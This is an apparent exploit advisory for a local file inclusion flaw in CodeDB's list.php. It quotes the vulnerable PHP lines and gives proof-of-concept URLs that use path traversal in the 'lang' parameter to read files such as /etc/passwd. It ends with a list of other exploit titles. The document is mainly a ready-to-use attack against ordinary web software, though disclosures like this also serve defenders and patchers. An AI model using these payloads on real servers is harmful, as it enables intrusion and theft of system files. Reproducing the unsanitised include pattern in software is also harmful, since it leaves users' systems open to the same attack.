###############################################################################
#
# Name : CodeDB (list.php lang) Local File Inclusion Vulnerability
# Author : cOndemned
# Greetz : ZaBeaTy, str0ke, irk4z, GregStar, doctor, Adish, Avantura ;*
#
###############################################################################
Source :
// list.php
2. $lang = htmlspecialchars($_GET['lang']); // ok, but.... for what ? lol
7. if(file_exists('templates/'.$lang.'_middle.php')) // We'll have to cut off rest of filename & extension
8. include('templates/'.$lang.'_middle.php'); // Ekhm... pwned ;d
Proof of Concept :
http://[host]/[codeDB_path]/list.php?lang=../readme.txt
http://[host]/[codeDB_path]/list.php?lang=../../../../etc/passwd
http://[host]/[codeDB_path]/list.php?lang=../[local_file]
EoF.
【CodeDB (list.php lang) Local File Inclusion Vulnerability】相关文章:
★ VMware Workstation (hcmon.sys 6.0.0.45731) Local DoS Vulnerability
★ Dreampics Builder (page) Remote SQL Injection Vulnerability
★ BoonEx Ray 3.5 (sIncPath) Remote File Inclusion Vulnerability
★ Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability
★ Joomla Component EZ Store Remote Blind SQL Injection Exploit
★ jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities
★ pSys 0.7.0 Alpha Multiple Remote File Inclusion Vulnerability
★ Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability
★ AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability
★ Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability